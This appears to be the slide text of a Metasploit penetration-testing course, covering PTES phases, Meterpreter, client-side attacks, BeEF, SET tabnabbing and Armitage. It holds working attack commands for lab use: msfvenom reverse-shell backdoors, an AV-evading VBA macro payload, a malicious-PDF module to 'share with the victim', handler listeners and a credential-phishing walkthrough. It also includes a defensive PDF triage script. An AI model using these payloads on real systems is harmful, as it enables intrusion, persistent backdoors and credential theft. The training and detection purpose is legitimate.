
Penetration Testing with METASPLOIT

Course Introduction

Course Outline
Introduction to Penetration Testing
Setting up Penetration Testing Lab
Metasploit 101
Meterpreter
Writing custom Meterpreter scripts
Client side attacks
Exploiting client side vulnerabilities
Exploiting browser based vulnerabilities
Post exploitation
Armitage
Social Engineering Toolkit
PowerSploit

Introduction to PENETRATION TESTING

Introduction to Penetration Testing


Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack.

Importance
Penetration tests are valuable for several reasons:
Determining the feasibility of a particular set of attack vectors
Identifying higher-risk vulnerabilities which could lead to a security breach
Identifying vulnerabilities
Testing the ability of network defenders
Providing evidence to support increased investment in security personnel and technology

Penetration Testing Execution Standard


PTES (Penetration Testing Execution Standard)
Aims to provide security standards for business organizations and security service providers
Lays down a standard for performing penetration tests (currently in beta)
Penetration Testing Execution Methodology
Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting
Source : http://www.pentest-standard.org/

Pre-Engagement Interactions

Mainly involves interaction with the client
Agenda focuses on the penetration testing road map
Questionnaires
Payment terms

Intelligence Gathering
The main activity is reconnaissance (information gathering) for the penetration test
Its results feed into the other stages of the penetration test
Different tools and scripts are used for information gathering on different platforms

Threat Modeling
Builds on the intelligence gathered and on the pre-engagement information
Methodology
Business asset analysis
Business process analysis
Threat agent/community analysis
Threat capability analysis
Motivation modeling
Finding relevant news of comparable organizations being compromised

Vulnerability Analysis
Involves discovering flaws in the target system
Different tools and scripts are used for performing vulnerability analysis on different platforms
A threat level classification needs to be created for the exploitation phase
Threats are prioritized by threat level, then analyzed and exploited
Directly feeds into the exploitation phase

Exploitation
Completely depends on the vulnerability analysis phase and focuses on exploiting the target
Exploits the target with the appropriate exploit after a compatibility check
The pentester may need to evade or bypass security systems in order to trigger the exploit successfully

Post Exploitation
Involves extending the attack
The pentester can gather further information during post exploitation
This might include sensitive ("juicy") information
Using the post exploitation phase, the attacker can enhance persistence on the compromised system

Reporting
Consists of a penetration testing executive summary and a technical report
The executive summary focuses on threat level severity, general findings, a recommendation summary and a road map
The technical report details how vulnerability analysis, exploitation and post exploitation were carried out
Based on the report, the technical team can move on to patch management

Setting up PENETRATION TESTING Lab

Setting up Penetration Lab

We will focus on creating our own virtual test beds as well as using third-party ones
Every test bed has multiple vulnerabilities added
Everything stays on the safe side (no loss)
Test beds run different operating systems with different configurations and added vulnerabilities

Lab Setup Overview

Virtualization
Virtualization, in computing, refers to the act of creating a virtual (rather than actual) version of something, including but not limited to a virtual computer hardware platform, operating system (OS), storage device, or computer network resources. --Wikipedia

Requirements for creating a virtualization environment
Virtualization software (VirtualBox, VMware, or another hypervisor)
RAM (minimum 4GB)
Virtual test beds or operating system installer ISO images
Good processor above 2.8GHz

Buzz Words
Host operating system: the main operating system installed on the computer system
Guest operating system: any operating system installed using virtualization software
Snapshot: saving the state of a virtual machine
Clone: copying the state of a virtual machine

Installing and Setting up Virtual Lab

Snapshot and Cloning

METASPLOIT 101

Metasploit 101
Introduces the Metasploit Framework
Buzzwords, architecture, framework architecture, interfaces and modules
Scope for exploiting target vulnerabilities using the built-in exploits and payloads

Buzz Words

Vulnerability
A weakness existing in a system through which it could be compromised.

Exploit
Code that works against the vulnerability in the target system.

Payload
The actual code that lets an attacker gain access after exploitation.

Penetration Testing using Metasploit

Widely used tool for developing exploits and testing vulnerabilities
A buzzword in the security community
Used for penetration testing
IDS signature development
Exploit development

Why opt for Metasploit

Widely accepted tool for testing vulnerabilities
Makes complex tasks easier
Possesses a rich set of modules organized in a systematic manner
Has regular updates
Contains different types of modules: 1000+ exploits, 200+ payloads, 500+ auxiliary modules

Metasploit Architecture
Libraries: REX, MSF CORE, MSF BASE
Interfaces: Console, CLI, Web, GUI, Armitage
Tools
Plugins
Modules: Payloads, Exploits, Encoders, Post modules, Auxiliary

Exploits
The actual code that works against the vulnerability in the target system.
MSF organizes exploits in a modular way based on OS and service classification
Exploit ranking values
1. ManualRanking
2. LowRanking
3. AverageRanking
4. NormalRanking
5. GoodRanking
6. GreatRanking
7. ExcellentRanking
Source : https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking

Exploits Ranking
1. ManualRanking: The exploit is so unstable or difficult to exploit that it is basically a DoS
2. LowRanking: The exploit is nearly impossible to exploit (or under 50%) for common platforms
3. AverageRanking: The exploit is generally unreliable or difficult to exploit
4. NormalRanking: The exploit is otherwise reliable, but depends on a specific version and can't reliably auto-detect
5. GoodRanking: The exploit has a default target and it is the "common case" for this type of software
6. GreatRanking: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check
7. ExcellentRanking: The exploit will never crash the service

Source : https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking

Payloads

Singles
Self-contained payloads that perform a specific task

Stagers
Bridge the connection establishment

Stages
Payload components that are downloaded by stager modules

Post Exploitation
A critical component of a penetration test
Assists the pentester in gathering information about the exploited system
Enhances the attack in the targeted environment
Can be extended in the pivoting stage
MSF has inbuilt and external scripts to perform post exploitation
These vary for different OS types

Auxiliary Modules
MSF Auxiliary contains a wide variety of modules related to different services, used for doing specific tasks

Auxiliary module categories
admin
crawlers
scanners
fuzzers
sniffers ....

Example: scanning for directories that exist on a web server

MSF Tools and Plugins

MSF contains inbuilt and third-party tools which are widely used at runtime during regular pentests
Example: importing a Nessus scan report, which can later be used for launching attacks based on the report
Inbuilt MSF tools come in handy especially during the post exploitation phase
Ex: memdump

MSF Tools

MSF Plugins

MSF Interfaces
Console
Armitage
Web
CLI
GUI

Present Scenario

If the exploit and payload get executed, we get Meterpreter

Meterpreter

meterpreter >
It is the default go-to payload for Windows
Provides an enhanced command shell for the attacker
Consists of a default set of core commands
Can be extended at runtime by shipping DLLs to the victim machine
Provides a basic post-exploitation API

Working of Meterpreter
Getting a Meterpreter shell goes through 3 different stages:
1. The exploit + stage 1 payload is sent
2. The DLL injection payload is sent
3. The Meterpreter DLL starts communication

Working with Meterpreter

Covers usage of Meterpreter

Meterpreter basics
Core commands
File system commands
Networking commands
System commands
User interface commands

Launching Attack
Stage 1: Creating an executable backdoor
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.206.159 LPORT=44444 X > /var/www/evil.exe
root@kali:# apachectl start
Stage 2: Enabling the listener to connect back to the attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit

Client Side Attacks

Introduction to Client Side Attacks

Targets the exploitation of client-side vulnerabilities
Cracks the perimeter from the client-side work environment
Includes:
Email
Java
Office suite
3rd party applications
Browsers
Whole agenda focuses on client-side exploitation: client-side software
Exploiting vulnerable services
Exposure to hostile servers

Lab Environment

Contains a different set of operating systems
Preconfigured with added vulnerabilities
Scenario based
Different stages
Security levels
Goal is to pwn

Agenda
Exploiting:
Software based vulnerabilities
Web based vulnerabilities
Browser based vulnerabilities

Introduction to Client Side Attacks

Level     PATCHED   ANTIVIRUS   FIREWALL
STAGE 1   NO        NO          NO
STAGE 2   NO        NO          YES
STAGE 3   NO        YES         YES
STAGE 4   YES       YES         YES
Stage 1

Level     PATCHED   ANTIVIRUS   FIREWALL
STAGE 1   NO        NO          NO

The attacker creates a backdoor and deploys it on an unprotected system, where:
Anti Virus: Absent
Updates: Absent
Firewall: Absent

Time for Demo

Victim
Attacker

Exploiting Client Side Vulnerabilities

Exploiting Client-Side Vulnerabilities

Agenda
Introduction to MSF payloads
Exploiting MS-Office suite programs using custom macros
Msfpayload, Msfencode, Msfvenom
Exploiting Word and PDF documents
Introduction to binary payloads
Introduction to the Veil framework
Creating custom binary payload types
Analyzing custom binary payloads using the Veil framework
File format exploits
Porting exploits and exploiting client side vulnerabilities
Encoding payloads into VBA code
Making persistent backdoors

Introduction to MSF Payloads

MSF contains different payloads with different sets of options
Inbuilt with a custom set of commands
Everything depends on the flexibility of the payload
Focus on exploit development and exploitation on different OS platforms, depending on which vulnerabilities exist.

Msfpayload, Msfencode, Msfvenom

Msfpayload
The msfpayload module is used for creating custom executables and generating shellcode in different formats.

Msfencode
Shellcode generated by msfpayload may contain null characters; shellcode that is deployed or passed over a network might also lead to AV / IDS & IPS detection. The msfencode module helps avoid such bad characters.

Msfvenom
Msfpayload + Msfencode = Msfvenom (a single tool combining both)

Binary Payload
Developed using msfpayload
Requires a bit of social engineering
The attacker needs to create an exe file and get it onto the victim machine
On the attacker side, a listener should be enabled
Whenever the victim opens the exe, the connection gets established

DEMO

Exploiting File Format Vulnerabilities

A user's desktop environment contains various software applications and networking services
It might contain outdated applications or poorly configured security services
Client side exploitation can easily be done using any one of the following:
Email
Java
Office suite
3rd party applications
Browsers

Exploiting MS-Office Suite Programs

Shellcode execution in MS-Office macros

Stage 1: Creating shellcode + payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.132 LPORT=443 -e x86/shikata_ga_nai -i 5 -f vba > vba.txt
Stage 2: Enabling the listener to connect back to the attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.132
msf > set LPORT 443
msf > exploit

Exploiting PDF Documents

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.132
msf > set LPORT 4444
msf > set INFILENAME /root/password.pdf
SHARE THE PDF FILE WITH THE VICTIM
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.132
msf > set LPORT 4444
msf > exploit
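
A document produced by the module above is dangerous because of its structure (an embedded file plus an action that launches it), not because of any page content. As an added example that is not part of the course, here is a Python triage routine that inflates FlateDecode streams and counts the PDF name objects associated with dropping or running content, tested on a constructed PDF skeleton and a constructed plain document. The name list, the two constructed samples and the verdict rules are this example's assumptions.

```python
import re
import zlib

# PDF name objects that let a document drop or run content when opened:
# attachments (/EmbeddedFile, /EmbeddedFiles, /Filespec), actions that execute
# or fire automatically (/Launch, /OpenAction, /AA), script hooks (/JavaScript, /JS).
RISKY_NAMES = (b"/EmbeddedFile", b"/EmbeddedFiles", b"/Filespec", b"/Launch",
               b"/OpenAction", b"/AA", b"/JavaScript", b"/JS")
# A name token ends at whitespace or a delimiter, so /JS never matches /JSx and
# /EmbeddedFile never matches /EmbeddedFiles.
NAME_END = rb"(?=[\s/\[\]<>(){}%]|$)"
# stream ... endstream bodies; the lookbehind stops "endstream" starting a match.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)

def inflate_streams(data: bytes) -> bytes:
    """Return the raw file plus the decoded body of every Flate stream."""
    parts = [data]
    for m in STREAM_RE.finditer(data):
        try:
            parts.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-compressed or truncated: raw bytes are still scanned
    return b"\n".join(parts)

def triage_pdf(data: bytes) -> dict:
    """Count each risky name in the file and in its inflated streams."""
    blob = inflate_streams(data)
    hits = {}
    for name in RISKY_NAMES:
        n = len(re.findall(re.escape(name) + NAME_END, blob))
        if n:
            hits[name.decode()] = n
    return hits

def verdict(hits: dict) -> str:
    # /Launch, or an attachment paired with something that fires on open, means
    # the document can run dropped content without further user action.
    fires_on_open = "/OpenAction" in hits or "/AA" in hits
    if "/Launch" in hits or ("/EmbeddedFile" in hits and fires_on_open):
        return "block"
    return "review" if hits else "allow"

# Constructed skeleton of an attachment-dropping PDF: the catalog carries an
# EmbeddedFiles tree and an OpenAction; the Launch action (object 5) is tucked
# inside a compressed object stream; the attachment body is placeholder text.
DROPPER_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /Names << /EmbeddedFiles 4 0 R >>"
    b" /OpenAction 5 0 R >> endobj\n"
    b"4 0 obj << /Names [(update.exe) 6 0 R] >> endobj\n"
    b"6 0 obj << /Type /Filespec /F (update.exe) /EF << /F 7 0 R >> >> endobj\n"
    b"7 0 obj << /Type /EmbeddedFile /Filter /FlateDecode >>\nstream\n"
    + zlib.compress(b"MZ placeholder bytes, constructed for the example")
    + b"\nendstream\nendobj\n"
    b"8 0 obj << /Type /ObjStm /N 1 /First 4 /Filter /FlateDecode >>\nstream\n"
    + zlib.compress(b"5 0 << /Type /Action /S /Launch /F 6 0 R >>")
    + b"\nendstream\nendobj\n%%EOF\n"
)
# Constructed plain document: one page whose only stream draws text.
PLAIN_PDF = (
    b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj\n"
    b"4 0 obj << /Filter /FlateDecode >>\nstream\n"
    + zlib.compress(b"BT /F1 12 Tf (Quarterly report) Tj ET")
    + b"\nendstream\nendobj\n%%EOF\n"
)
```

The /Launch name in the dropper sample is only visible after the object stream is inflated, which is why the scan cannot stop at the raw bytes.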

Exploiting Software Based Vulnerabilities

Exploiting Software based Vulnerabilities

Agenda
Introduction to software based vulnerabilities
Analyzing how to exploit a fully patched system
Analyzing and exploiting software vulnerabilities

Introduction to software based vulnerabilities

Targets the exploitation of client-side vulnerabilities
Cracks the perimeter from the client-side work environment
Whole agenda focuses on client-side exploitation: client-side software
Exploiting vulnerable services

Source : http://www.exploit-db.com/

Analyzing how to exploit fully patched machine

Level     PATCHED   ANTIVIRUS   FIREWALL
STAGE 1   NO        NO          NO
STAGE 2   NO        NO          YES
STAGE 3   NO        YES         YES
STAGE 4   YES       YES         YES

Analyzing how to exploit fully patched machine

Let's check for any vulnerable service running on the victim's machine
We will exploit core software based vulnerabilities

Victim Environment

Analyzing and Exploiting Vulnerability

Analyzing and Exploiting Vulnerability

Exploiting Browser Based Vulnerabilities

Exploiting Browser based Vulnerabilities

Agenda
Introduction to browser based vulnerabilities
Exploiting browser based vulnerabilities using Metasploit
Introduction to the Browser Exploitation Framework (BeEF)
Installing and configuring BeEF on the attacker machine
Exploiting browser based vulnerabilities using BeEF

Introduction to Browser Attacks


A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an
operating system or piece of software with the intent to breach browser security to alter a user's browser
settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript,
and other Web technologies and cause the browser to run arbitrary code.

-- Wikipedia

Exploiting Browser Vulnerabilities using MSF

The user environment might be running an outdated browser
The victim needs to browse to the attacker's shared URL
Once the victim navigates to the attacker's URL, the victim's machine gets exploited and the connection is established

Browser Exploitation Framework (BeEF)

Open source tool for testing and exploiting web application and browser-based vulnerabilities
Testing and exploitation are done from the client side

Features
BeEF's modular framework allows the addition of custom browser exploitation commands.
The extension API allows users to change BeEF's core behavior.
Keystroke logging
Browser proxying
Integration with Metasploit
Plugin detection
Intranet service exploitation
PhoneGap modules
Hooking through QR codes
Social engineering modules spur user responses such as entering sensitive data and responding to reminders to update software
RESTful API allows control of BeEF through HTTP requests (JSON format).

Source: http://en.wikipedia.org/wiki/BeEF

Browser Exploitation Framework (BeEF) Architecture

BeEF Project

Installing and Configuring BeEF

Installation
root@kali: apt-get update
root@kali: apt-get install beef-xss

Configuring
Edit config.yaml and set metasploit to true
vi /usr/share/beef-xss/config.yaml
vi /usr/share/beef-xss/extensions/metasploit/config.yaml
Add the Kali Linux IP at lines 18 and 26
host: "192.168.159.132"
callback_host: "192.168.159.132"
Add the MSF framework path at line 37
{os: 'custom', path: '/usr/share/metasploit-framework/'}
Load the MSGRPC plugin in msfconsole
msf> load msgrpc ServerHost=192.168.159.132 Pass=abc123

Launching
root@kali: cd /usr/share/beef-xss/
root@kali:/usr/share/beef-xss# ./beef

Time for Demo

Social Engineering Toolkit (S.E.T.)

Social Engineering Toolkit

Agenda
Introduction to social engineering
Introduction to SET
Installing and configuring the Social Engineering Toolkit
Working on SET modules and launching attacks using SET

Social Engineering

"The human factor is truly security's weakest link"

Kevin Mitnick

Motivation
Self Interest
Mr. X wants to access and/or modify information associated with a family member, colleague or even a neighbor.

Revenge
Mr. X targets a friend, colleague, organization or even a total stranger to satisfy the emotional desire for vengeance.

Curiosity
Mr. X receives pressure from friends, family or organized crime syndicates for reasons such as financial gain, self-interest and/or revenge.

The Root Cause

People want to be helpful
Sometimes the help goes too far and they give away too much information.
People want to avoid confrontation
It's difficult for some people to ask others to prove who they are. They don't want confrontation.
People like convenience
No one wants to be put out by additional security even though it may benefit the organization.
People are messy
By nature, they leave paper around, copy multiple people on e-mail, and leak data.
People are curious
A great example is an employee who finds a USB drive in the parking lot. The first thing they do when they get to their desk is plug it in to see what's on it.
People appeal to the senses
Building a relationship with a sweet voice.

Life Cycle of Social Engineering

Introduction to SET
The Social-Engineer Toolkit (SET) was created and written by Dave Kennedy, the founder of TrustedSec
Focuses on exploiting human weakness
Interfaces:
Command line
Web

Introduction to Command-line Interface

Introduction to Web Interface

Working on SET modules & launching attacks using SET

Performing a Tabnabbing attack using SET
Tabnabbing Attack

Introduction to Tabnabbing
"It can detect that you're logged into Citibank right now and Citibank has been training you to log into your account every 15 minutes because it logs you out for better security. It's like being hit by the wrong end of the sword."

Aza Raskin
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

Behind the Curtains
The attacker uses customized scripts and a hosting service to pass the fake page off as the original.
How to do it: files placed on the hosting site
index-1.html
index-2.html
tabnab.js (script.js)
script.php
log.txt

Tabnabbing using SET

root@kali:~# cd /usr/share/set/
root@kali:/usr/share/set# ./setoolkit
1. Social Engineering Attacks
2. Website Attack Vectors
4. Tabnabbing
2. Site Cloner
Enter the attacker's IP
Enter the URL to clone
The victim should open the attacker's URL and then switch to a new tab. Whatever tab was left open in the background gets refreshed and loads the phishing page. If the victim supplies credentials there, they are posted back to the attacker's machine.

Captured Credentials

Armitage

Armitage
Agenda
Introduction to Armitage
Installing and configuring Armitage
Host Management
Dynamic Workspaces
Importing Hosts
Scanning and exploiting targets
Exploit Automation

Introduction to Armitage
GUI front-end for the Metasploit Framework, developed by Raphael Mudge

Installation and Configuration

Kali Linux ships with Armitage and all its dependencies.
root@kali: service postgresql start
root@kali: service metasploit start
root@kali: armitage

Launching Armitage

Armitage UI

Adding Host

Scanning Host

Finding Attacks

Launching Attack

Compromised System

Thank You
